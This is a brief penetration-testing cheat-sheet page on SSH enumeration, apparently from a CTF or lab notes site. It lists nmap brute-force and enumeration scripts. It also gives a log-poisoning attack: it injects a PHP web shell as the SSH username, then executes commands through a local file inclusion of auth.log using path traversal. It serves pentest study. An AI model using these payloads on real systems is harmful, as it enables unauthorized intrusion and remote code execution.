SSH Enum

SSH Enumeration

CheckList

Probably not useful unless you uploaded key anywhere or found a private key file. Sometimes useful for log file poisoning with LFI.

Login and test SSH connectivity

ssh username@somedomain.com
OR
ssh username@10.10.10.20

SSH NMAP Scripts

nmap -sV -Pn -vv -p 22 --script ssh-auth-methods,ssh-brute,ssh-hostkey,ssh-publickey-acceptance,ssh-run,ssh2-enum-algos,sshv1 10.10.10.20

Code Execution through SSH/LFI

ssh '<?php system($_GET['cmd']); ?>'@10.10.10.10
==========================================================================
After this and on the LFI you have discovered just place the variable cmd:
?cmd=id
&cmd=id 

http://10.10.10.10/somedir/lfi.php?file=../../../../../var/log/auth.log&cmd=id
http://10.10.10.10/somedir/lfi.php?file=../../../../../var/log/auth.log&cmd=whoami
PreviousFTP EnumNextMySQL Enum

Last updated